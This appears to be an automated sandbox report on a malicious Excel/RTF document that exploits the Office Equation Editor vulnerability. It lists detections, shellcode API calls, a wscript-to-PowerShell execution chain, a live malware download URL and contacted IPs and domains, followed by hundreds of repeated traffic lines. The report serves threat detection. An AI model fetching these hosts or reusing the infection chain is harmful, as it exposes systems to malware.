Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Multi AV Scanner detection for domain / URL

Source: http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Source: P018400.xla.xlsx	ReversingLabs: Detection: 15%
Source: P018400.xla.xlsx	Virustotal: Detection: 22%			Perma Link

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 91.92.244.96 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: eib.pdb;Q source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bib.pdb>Q source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: t.pdb,Q source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Automation.pdbpdbzY source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 12_2_035306D0 ShellExecuteW,ExitProcess,	12_2_035306D0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 12_2_035306A2 URLDownloadToFileW,ShellExecuteW,ExitProcess,	12_2_035306A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 12_2_03530629 LoadLibraryW,ShellExecuteW,ExitProcess,	12_2_03530629
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 12_2_035306F5 ExitProcess,	12_2_035306F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 12_2_03530574 ExitProcess,	12_2_03530574
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 12_2_035306BB ShellExecuteW,ExitProcess,	12_2_035306BB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 12_2_035305A9 LoadLibraryW,	12_2_035305A9

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: uploaddeimagens.com.br

Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49160 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.84.67:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
